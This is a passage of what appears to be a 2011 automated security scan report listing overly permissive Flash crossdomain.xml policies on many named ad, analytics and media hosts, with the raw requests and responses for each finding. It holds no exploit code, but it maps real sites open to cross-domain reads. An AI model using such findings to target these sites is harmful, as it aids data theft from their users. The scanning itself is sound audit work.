HTTP/1.1 200 OK Server: Test & Target Content-Type: application/xml Date: Sun, 04 Sep 2011 00:45:31 GMT Accept-Ranges: bytes ETag: W/"201-1313024241000" Connection: close Last-Modified: Thu, 11 Aug 2011 00:57:21 GMT Content-Length: 201 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://statse.webtre |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: statse.webtrendslive.com |
HTTP/1.1 200 OK Content-Length: 82 Content-Type: text/xml Last-Modified: Thu, 20 Dec 2007 20:24:48 GMT Accept-Ranges: bytes ETag: "ef9fe45d4643c81:8bf" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Sun, 04 Sep 2011 00:56:18 GMT Connection: close <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://studio-5 |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: studio-5.financialcontent |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 01:24:19 GMT Server: nginx/0.8.15 Content-Type: text/html; charset=UTF-8 P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Last-Modified: Sun, 04 Sep 2011 01:24:19 GMT X-Cache: MISS from squid2.sv1.financial X-Cache-Lookup: MISS from squid2.sv1.financial Via: 1.0 squid2.sv1.financial Vary: Accept-Encoding Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-poli ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://sync.adap.tv |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: sync.adap.tv |
HTTP/1.0 200 OK Content-Type: application/xml Connection: close Content-Length: 204 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://sync.mathtag.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: sync.mathtag.com |
HTTP/1.0 200 OK Cache-Control: no-cache Connection: close Content-Type: text/cross-domain-policy P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 pao-pixel-x3 pid 0xca8 3240 Set-Cookie: ts=1315099467; domain=.mathtag.com; path=/; expires=Mon, 03-Sep-2012 01:24:27 GMT Connection: keep-alive Content-Length: 215 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross- ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://sync.tidaltv.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.1 Host: sync.tidaltv.com Proxy-Connection: keep-alive Referer: http://s3.cinesport.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Accept-Ranges: bytes Content-Type: text/xml Date: Sun, 04 Sep 2011 01:11:58 GMT ETag: "da861e55beecca1:17eb" Last-Modified: Thu, 06 May 2010 01:49:14 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 78 Connection: keep-alive <cross-domain-policy> <allow-access-from domain="*"/> </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://tags.bluekai.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: tags.bluekai.com |
HTTP/1.0 200 OK Date: Sun, 04 Sep 2011 00:48:05 GMT Server: Apache/2.2.3 (CentOS) Last-Modified: Wed, 29 Jun 2011 21:44:06 GMT ETag: "11003d9-ca-4a6e0af03f580 Accept-Ranges: bytes Content-Length: 202 Content-Type: text/xml Connection: close <cross-domain-policy> <allow-access-from domain="*" to-ports="*"/> <site-control permitted-cross-domain <allow-http-request </cross-domain-policy ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://tcr.tynt.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: tcr.tynt.com |
HTTP/1.0 200 OK Accept-Ranges: bytes Cache-Control: max-age=1800 Content-Type: text/xml Date: Sun, 04 Sep 2011 01:06:33 GMT ETag: "251523935" Expires: Sun, 04 Sep 2011 01:36:33 GMT Last-Modified: Tue, 10 Nov 2009 16:25:33 GMT Server: ECS (sjo/5227) X-Cache: HIT Content-Length: 201 Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://traffic.outbrain |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: traffic.outbrain.com |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Accept-Ranges: bytes ETag: W/"201-1311068652000" Last-Modified: Tue, 19 Jul 2011 09:44:12 GMT Content-Type: application/xml Content-Length: 201 Date: Sun, 04 Sep 2011 01:24:37 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://trc.taboolasy |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: trc.taboolasyndication |
HTTP/1.1 200 OK Server: nginx/1.0.0 Date: Sun, 04 Sep 2011 00:50:47 GMT Content-Type: text/xml Content-Length: 409 Last-Modified: Sun, 10 Jul 2011 17:16:59 GMT Connection: close Vary: Accept-Encoding Accept-Ranges: bytes <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <site-control permitted-cross-domain <allow-access-from domain="*"/> <allow-access-from domain="*" secure="false"/> <allow-access-from domain="*" to-ports="80,443"/> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://usatoday1.112.2o7 |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: usatoday1.112.2o7.net |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 00:42:19 GMT Server: Omniture DC/2.0.0 xserver: www94 Content-Length: 137 Keep-Alive: timeout=15 Connection: close Content-Type: text/html <cross-domain-policy> <allow-access-from domain="*" /> <allow-http-request </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://vast.ap919.btrll |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.1 Host: vast.ap919.btrll.com Proxy-Connection: keep-alive Referer: http://s3.cinesport.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: BR_MBBV=Ak5fqqZQd |
HTTP/1.1 200 OK Connection: close Content-Type: application/xml Cache-Control: max-age=7776000 Date: Sun, 04 Sep 2011 01:12:49 GMT Content-Length: 269 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="*" /> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://video.od |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.1 Host: video.od.visiblemeasures Proxy-Connection: keep-alive Referer: http://c.brightcove.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Sun, 04 Sep 2011 01:17:21 GMT Content-Type: text/xml Content-Length: 169 Last-Modified: Tue, 01 Mar 2011 06:21:28 GMT X-Cnection: close Accept-Ranges: bytes <?xml version="1.0"?> <cross-domain-policy> <allow-access-from domain="*" /> <site-control permitted-cross-domain </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://wac.3a03 |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: wac.3a03.edgecastcdn.net |
HTTP/1.0 200 OK Accept-Ranges: bytes Content-Type: text/xml Date: Sun, 04 Sep 2011 00:44:51 GMT Last-Modified: Tue, 08 Mar 2011 05:43:30 GMT Server: ECS (sjo/5227) Content-Length: 203 Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-polic ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.goutsa.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.goutsa.com |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 01:26:15 GMT Server: Apache Last-Modified: Mon, 09 Mar 2009 13:39:57 GMT ETag: "5e-464afc52da540" Accept-Ranges: bytes Content-Length: 94 Vary: Accept-Encoding Connection: close Content-Type: text/xml <cross-domain-policy> <allow-access-from domain="*" secure="false" /> </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://www.wunderground |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.wunderground.com |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 01:28:36 GMT Server: Apache/1.3.33 (Unix) PHP/4.4.0 Last-Modified: Thu, 05 May 2011 20:05:54 GMT Accept-Ranges: bytes Content-Length: 201 Connection: close Content-Type: application/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.zvents.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.zvents.com |
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 04 Sep 2011 01:00:47 GMT Content-Type: text/xml Content-Length: 201 Last-Modified: Thu, 26 May 2011 23:14:54 GMT Connection: keep-alive Expires: Mon, 05 Sep 2011 01:00:47 GMT Cache-Control: max-age=86400 Accept-Ranges: bytes <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://adadvisor.net |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: adadvisor.net |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 00:42:17 GMT Connection: close Server: AAWebServer P3P: policyref="http://www Content-Length: 478 Content-Type: Content-Type: application/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="*.tubemogul.com" /> ...[SNIP]... <allow-access-from domain="*.adap.tv" /> ...[SNIP]... <allow-access-from domain="*.videoegg.com" /> ...[SNIP]... <allow-access-from domain="*.tidaltv.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://charlotteobserver |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: charlotteobserver |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 01:22:19 GMT Server: Apache Last-Modified: Wed, 10 Aug 2011 00:38:56 GMT Accept-Ranges: bytes Content-Length: 343 MS-Author-Via: DAV Connection: close Content-Type: application/xml <?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://cm.npc-mcclatchy |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: cm.npc-mcclatchy.overture |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 01:20:48 GMT P3P: policyref="http://info Last-Modified: Tue, 03 May 2011 10:14:38 GMT Accept-Ranges: bytes Content-Length: 639 Connection: close Content-Type: application/xml <?xml version="1.0" ?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="stage.mce.media.yahoo.com" secure="false" /> ...[SNIP]... <allow-access-from domain="mce.media.yahoo.com" secure="false" /> ...[SNIP]... <allow-access-from domain="*.yahoo.com" /> <allow-access-from domain="*.broadcast.com" /> <allow-access-from domain="*.launch.com" /> <allow-access-from domain="*.hotjobs.com" /> <allow-access-from domain="*.yimg.com" /> <allow-access-from domain="*.yahooligans.com" /> <allow-access-from domain="*.overture.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://content.usatoday |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: content.usatoday.com |
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Wed, 16 Mar 2011 20:16:44 GMT Accept-Ranges: bytes ETag: "c3bb41117e4cb1:0" Server: Microsoft-IIS/7.5 P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI" Date: Sun, 04 Sep 2011 00:42:14 GMT Connection: close Content-Length: 1558 <?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.usatoday.com" secure="true"/> ...[SNIP]... <allow-access-from domain="*.usatoday.net" secure="true"/> ...[SNIP]... <allow-access-from domain="projects.usatoday.com"/> <allow-access-from domain="*.gannettonline.com"/> <allow-access-from domain="www.smashingideas.com" secure="true"/> ...[SNIP]... <allow-access-from domain="beta.tagware.com" secure="true"/> ...[SNIP]... <allow-access-from domain="nmp.newsgator.com" secure="true"/> ...[SNIP]... <allow-access-from domain="maventechnologies.com" secure="true"/> ...[SNIP]... <allow-access-from domain="*.maventechnologies.com" secure="true"/> ...[SNIP]... <allow-access-from domain="mavenapps.net" secure="true"/> ...[SNIP]... <allow-access-from domain="*.mavenapps.net" secure="true"/> ...[SNIP]... <allow-access-from domain="hostlogic.ca" secure="true"/> ...[SNIP]... <allow-access-from domain="pages.samsung.com" secure="true"/> ...[SNIP]... <allow-access-from domain="*.pointroll.com" /> <allow-access-from domain="*.facebook.com" /> <allow-access-from domain="demo.pointroll.net" /> <allow-access-from domain="*.brightcove.com" secure="true" /> ...[SNIP]... <allow-access-from domain="*.metagrapher.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://delivery.sprint |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: delivery.sprint.com |
HTTP/1.1 200 OK Content-Length: 9520 Content-Type: text/xml Last-Modified: Tue, 26 Apr 2011 22:25:29 GMT Accept-Ranges: bytes ETag: "c695d9604cc1:1de6" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Sun, 04 Sep 2011 01:22:23 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <!--Modified file on 1/5/2010 for security compl ...[SNIP]... <allow-access-from domain="a676.g.akamaitech.net" /> <allow-access-from domain="staging.merchantmail.net" /> <allow-access-from domain="www.youcreatetheadventure <allow-access-from domain="gap.p.delivery.net" /> <allow-access-from domain="*.akamaitech.net" /> <allow-access-from domain="*.garnier-rewards.com"/> <allow-access-from domain="*.garnierrewards.com"/> <allow-access-from domain="*.lexus.com" secure="false" /> ...[SNIP]... <allow-access-from domain="*.msn.com" secure="false" /> ...[SNIP]... <allow-access-from domain="*.msn-ppe.com" secure="false" /> ...[SNIP]... <allow-access-from domain="*.msn-int.com" secure="false" /> ...[SNIP]... <allow-access-from domain="*.msn-int.com" secure="false" /> ...[SNIP]... <allow-access-from domain="*.msads.net" secure="false" /> ...[SNIP]... <allow-access-from domain="comcast.beamland.com" /> <allow-access-from domain="webwalker06.comcastonline <allow-access-from domain="dynamic.abc.go.com"/> <allow-access-from domain="ll.static.abc.com"/> <allow-access-from domain="ll.media.abc.com"/> <allow-access-from domain="*.abc.go.com"/> <allow-access-from domain="*.abc.com"/> <allow-access-from domain="www.sprintenterprise.com"/> <allow-access-from domain="sprintenterprise.com"/> <allow-access-from domain="*.eurorscg.com"/> <allow-access-from domain="motifcdn.doubleclick.net" /> <allow-access-from domain="motifcdn2.doubleclick.net" /> <allow-access-from domain="m.doubleclick.net" /> <allow-access-from domain="m2.doubleclick.net" /> <allow-access-from domain="m3.doubleclick.net" /> <allow-access-from domain="m.2mdn.net" /> <allow-access-from domain="m2.2mdn.net" /> <allow-access-from domain="*.doubleclick.net" /> <allow-access-from domain="*.2mdn.net" /> <allow-access-from domain="*.dell.com" /> <allow-access-from domain="primediamags.com" /> <allow-access-from domain="sourceinterlinkpubs.com" /> <allow-access-from domain="wellsfargo.p.delivery.net" /> ...[SNIP]... <allow-access-from domain="betadfa.doubleclick.net" secure="true" /> ...[SNIP]... <allow-access-from domain="dfa.doubleclick.net" secure="true" /> ...[SNIP]... <allow-access-from domain="motifcdn2.doubleclick.net" secure="true" /> ...[SNIP]... <allow-access-from domain="ad.doubleclick.net" secure="true" /> ...[SNIP]... <allow-access-from domain="m1.2mdn.net" secure="true" /> ...[SNIP]... <allow-access-from domain="etrade.com" secure="true" /> ...[SNIP]... <allow-access-from domain="us.etrade.com" secure="true" /> ...[SNIP]... <allow-access-from domain="*.etrade.com" secure="true" /> ...[SNIP]... <allow-access-from domain="a248.e.akamai.net" secure="true" /> ...[SNIP]... <allow-access-from domain="pandora.luxus.fi" secure="true" /> ...[SNIP]... <allow-access-from domain="interactive.arn.com"/> <allow-access-from domain="*.royalcaribbean.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.rccl.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.fedex.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.theweekmagazine.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.twmo.us" secure="false" /> ...[SNIP]... <allow-access-from domain="*.nokia.com" secure="false" /> ...[SNIP]... <allow-access-from domain="*.nokia.it" secure="false" /> ...[SNIP]... <allow-access-from domain="*.nokia.fi" secure="false"/> ...[SNIP]... <allow-access-from domain="*.nokia.fr" secure="false"/> ...[SNIP]... <allow-access-from domain="*.nokia.de" secure="false"/> ...[SNIP]... <allow-access-from domain="*.nokia.pt" secure="false"/> ...[SNIP]... <allow-access-from domain="*.nokia.ae" secure="false"/> ...[SNIP]... <allow-access-from domain="*.nokia.pl" secure="false"/> ...[SNIP]... <allow-access-from domain="*.nokia.hu" secure="false"/> ...[SNIP]... <allow-access-from domain="*.nokia.com.sa" secure="false"/> ...[SNIP]... <allow-access-from domain="*.nokia.at" secure="false"/> ...[SNIP]... <allow-access-from domain="*.nokia.ch" secure="false"/> ...[SNIP]... <allow-access-from domain="*.nokia.gr" secure="false"/> ...[SNIP]... <allow-access-from domain="*.nokia.es" secure="false"/> ...[SNIP]... <allow-access-from domain="*.nokia.ee" secure="false"/> ...[SNIP]... <allow-access-from domain="*.nokia.bg" secure="false"/> ...[SNIP]... <allow-access-from domain="*.nokia.nz" secure="false"/> ...[SNIP]... <allow-access-from domain="*.nokia.co.th" secure="false"/> ...[SNIP]... <allow-access-from domain="*.nokia.com.hr" secure="false"/> ...[SNIP]... <allow-access-from domain="*.nokia.si" secure="false"/> ...[SNIP]... <allow-access-from domain="*.nokia.cz" secure="false"/> ...[SNIP]... <allow-access-from domain="*.nokia.sk" secure="false"/> ...[SNIP]... <allow-access-from domain="*.nokia.com.tr" secure="false"/> ...[SNIP]... <allow-access-from domain="*.mea.nokia.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.nokia.se" secure="false"/> ...[SNIP]... <allow-access-from domain="*.nokia.dk" secure="false"/> ...[SNIP]... <allow-access-from domain="*.nokia.no" secure="false"/> ...[SNIP]... <allow-access-from domain="view.atdmt.com" secure="false" /> ...[SNIP]... <allow-access-from domain="anon.screenplay.speedera ...[SNIP]... <allow-access-from domain="*.joyent.com" secure="false" /> ...[SNIP]... <allow-access-from domain="*.joyent.com" secure="false" /> ...[SNIP]... <allow-access-from domain="vmd-gap-app1" secure="false" /> ...[SNIP]... <allow-access-from domain="vmu-gap-app1" secure="false" /> ...[SNIP]... <allow-access-from domain="72.2.118.90" secure="false" /> ...[SNIP]... <allow-access-from domain="118.2.72.in-addr.arpa" secure="false" /> ...[SNIP]... <allow-access-from domain="vmu-gap-app1.sf.akqa.com" secure="false" /> ...[SNIP]... <allow-access-from domain="vmd-gap-app1.sf.akqa.com" secure="false" /> ...[SNIP]... <allow-access-from domain="*.gap.com" secure="false"/> ...[SNIP]... <allow-access-from domain="oldnavyweekly.com" secure="false" /> ...[SNIP]... <allow-access-from domain="stage.oldnavyweekly.com" secure="false" /> ...[SNIP]... <allow-access-from domain="dev.oldnavyweekly.com" secure="false" /> ...[SNIP]... <allow-access-from domain="oldnavyweekly.cpbint ...[SNIP]... <allow-access-from domain="on.cpbstaging.com" secure="false" /> ...[SNIP]... <allow-access-from domain="oldnavyweekly.com.evohst ...[SNIP]... <allow-access-from domain="stage.oldnavyweekly.com ...[SNIP]... <allow-access-from domain="dev.oldnavyweekly.com ...[SNIP]... <allow-access-from domain="onweeklydev.cpbstaging ...[SNIP]... <allow-access-from domain="*.samsclub.com" secure="false"/> ...[SNIP]... <allow-access-from domain="samsclub.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.rockfishinteractive.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.oldnavyweekly.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.cpbstaging.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.intava.com" secure="true"/> ...[SNIP]... <allow-access-from domain="*.lstudio.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.digitas.com" secure="false"/> ...[SNIP]... <allow-access-from domain="comcast.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.comcast.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.sprint.com" secure="false" /> ...[SNIP]... <allow-access-from domain="*.cheerfactory.com" secure="false" /> ...[SNIP]... <allow-access-from domain="app1.gap.preloading.co.uk" secure="false" /> ...[SNIP]... <allow-access-from domain="app2.gap.preloading.co.uk" secure="false" /> ...[SNIP]... <allow-access-from domain="*.asimpletheory.com" secure="false" /> ...[SNIP]... <allow-access-from domain="*.unicast.com" secure="false" /> ...[SNIP]... <allow-access-from domain="208.82.64.0" secure="true" /> ...[SNIP]... <allow-access-from domain="208.82.64.22" secure="true" /> ...[SNIP]... <allow-access-from domain="208.82.66.10" secure="true" /> ...[SNIP]... <allow-access-from domain="208.82.66.11" secure="true" /> ...[SNIP]... <allow-access-from domain="208.82.66.12" secure="true" /> ...[SNIP]... <allow-access-from domain="208.82.66.13" secure="true" /> ...[SNIP]... <allow-access-from domain="208.82.66.14" secure="true" /> ...[SNIP]... <allow-access-from domain="208.82.66.15" secure="true" /> ...[SNIP]... <allow-access-from domain="208.82.66.16" secure="true" /> ...[SNIP]... <allow-access-from domain="208.82.66.17" secure="true" /> ...[SNIP]... <allow-access-from domain="208.82.66.18" secure="true" /> ...[SNIP]... <allow-access-from domain="208.82.66.19" secure="true" /> ...[SNIP]... <allow-access-from domain="69.25.20.216" secure="true" /> ...[SNIP]... <allow-access-from domain="stage-user-comcast.com" secure="false" /> ...[SNIP]... <allow-access-from domain="24.40.23.69" secure="false" /> ...[SNIP]... <allow-access-from domain="68.87.60.144" secure="false" /> ...[SNIP]... <allow-access-from domain="*.acxiomdigital.com" secure="false" /> ...[SNIP]... <allow-access-from domain="*.jellyvision-conver ...[SNIP]... <allow-access-from domain="159.153.236.12" secure="false"/> ...[SNIP]... <allow-access-from domain="*.progressive.com" secure="false" /> ...[SNIP]... <allow-access-from domain="*.materialdev.com" secure="false" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://developers |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: developers.facebook.com |
HTTP/1.0 200 OK Content-Type: text/x-cross-domain X-FB-Server: 10.28.34.106 Connection: close Content-Length: 1527 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="s-static.facebook.com" /> <allow-access-from domain="static.facebook.com" /> <allow-access-from domain="static.api.ak.facebook <allow-access-from domain="*.static.ak.facebook.com" /> <allow-access-from domain="s-static.thefacebook.com" /> <allow-access-from domain="static.thefacebook.com" /> <allow-access-from domain="static.api.ak.thefacebook <allow-access-from domain="*.static.ak.thefacebook <allow-access-from domain="*.static.ak.fbcdn.com" /> <allow-access-from domain="s-static.ak.fbcdn.net" /> <allow-access-from domain="*.static.ak.fbcdn.net" /> <allow-access-from domain="s-static.ak.facebook.com" /> <allow-access-from domain="www.facebook.com" /> <allow-access-from domain="www.new.facebook.com" /> <allow-access-from domain="register.facebook.com" /> <allow-access-from domain="login.facebook.com" /> <allow-access-from domain="ssl.facebook.com" /> <allow-access-from domain="secure.facebook.com" /> <allow-access-from domain="ssl.new.facebook.com" /> <allow-access-from domain="static.ak.fbcdn.net" /> <allow-access-from domain="fvr.facebook.com" /> <allow-access-from domain="www.latest.facebook.com" /> <allow-access-from domain="www.inyour.facebook.com" /> <allow-access-from domain="www.beta.facebook.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://disqus.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: disqus.com |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 01:22:27 GMT Server: Apache Vary: Cookie,Accept-Encoding X-User: anon:608614822849 p3p: CP="DSP IDC CUR ADM DELi STP NAV COM UNI INT PHY DEM" Connection: close Content-Type: text/x-cross-domain <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.usopen.org" to-ports="80,96" secure="false" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://espn.go.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: espn.go.com |
HTTP/1.1 200 OK Cache-Control: max-age=5184000 Connection: close Date: Sun, 04 Sep 2011 01:22:27 GMT Content-Type: text/xml Last-Modified: Thu, 25 Aug 2011 19:50:02 GMT Accept-Ranges: bytes Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: N730 Cache-Expires: Tue, 01 Nov 2011 19:32:31 GMT Content-Length: 7286 Vary: Accept-Encoding <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <allow-http-request ...[SNIP]... <allow-access-from domain="*.espn.go.com" to-ports="*" secure="false"/> ...[SNIP]... <allow-access-from domain="profiles.sportsnation ...[SNIP]... <allow-access-from domain="profiles.staging.espnfp ...[SNIP]... <allow-access-from domain="*.go.com" to-ports="*" secure="false"/> ...[SNIP]... <allow-access-from domain="*.starwave.com" to-ports="*" secure="false"/> ...[SNIP]... <allow-access-from domain="*.adsatt.espn.starwave ...[SNIP]... <allow-access-from domain="*.static.espn.go.com" to-ports="*" /> ...[SNIP]... <allow-access-from domain="*.disney.go.com" to-ports="*" /> ...[SNIP]... <allow-access-from domain="*.abclocal.go.com" to-ports="*" /> ...[SNIP]... <allow-access-from domain="*.corp.espn3.com" to-ports="*" /> ...[SNIP]... <allow-access-from domain="*.espncdn.com" to-ports="*" secure="false" /> ...[SNIP]... <allow-access-from domain="*.doubleclick.net" to-ports="*" secure="false" /> ...[SNIP]... <allow-access-from domain="*.doubleclick.com" to-ports="*" secure="false" /> ...[SNIP]... <allow-access-from domain="*.pointroll.com" to-ports="*"/> <allow-access-from domain="*.2mdn.net" to-ports="*" secure="false" /> ...[SNIP]... <allow-access-from domain="m.uk.2mdn.net" secure="true" /> ...[SNIP]... <allow-access-from domain="m.fr.2mdn.net" secure="true" /> ...[SNIP]... <allow-access-from domain="m.se.2mdn.net" secure="true" /> ...[SNIP]... <allow-access-from domain="m.de.2mdn.net" secure="true" /> ...[SNIP]... <allow-access-from domain="*.arn.com"/> <allow-access-from domain="*.akamai.net" secure="true" to-ports="*"/> ...[SNIP]... <allow-access-from domain="*.edgefcs.net" secure="false" to-ports="*"/> ...[SNIP]... <allow-access-from domain="clearspring.com" to-ports="*" secure="false"/> ...[SNIP]... <allow-access-from domain="*.clearspring.com" to-ports="*" secure="false"/> ...[SNIP]... <allow-access-from domain="*.espnmediaflo.com" to-ports="*" secure="false"/> ...[SNIP]... <allow-access-from domain="host-a.oddcast.com" to-ports="*" secure="false" /> ...[SNIP]... <allow-access-from domain="host-d.oddcast.com" to-ports="*" secure="false" /> ...[SNIP]... <allow-access-from domain="host.staging.oddcast.com" to-ports="*" secure="false" /> ...[SNIP]... <allow-access-from domain="*.l4b3l.com" secure="true" /> 